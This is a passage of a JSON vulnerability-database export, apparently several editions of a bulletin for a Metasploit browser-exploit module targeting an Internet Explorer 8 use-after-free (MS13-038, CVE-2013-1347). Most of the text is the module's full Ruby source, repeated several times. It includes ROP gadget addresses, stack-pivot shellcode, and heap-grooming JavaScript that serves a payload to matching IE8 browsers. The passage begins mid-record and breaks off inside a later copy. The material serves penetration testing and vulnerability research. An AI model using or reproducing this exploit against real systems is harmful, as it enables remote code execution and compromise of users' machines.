["CVE-2013-1347"], "lastseen": "2018-03-10T00:59:34", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-10T00:59:34"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-10T00:59:34", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-10T03:03:06", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-10T03:03:06"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-10T03:03:06", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-12T11:08:29", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-12T11:08:29"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-03-12T11:08:29", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-03-12T13:13:55", "history": [], "viewCount": 68, "enchantments": {"score": {"value": 9.0, "modified": "2018-03-12T13:13:55"}}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n 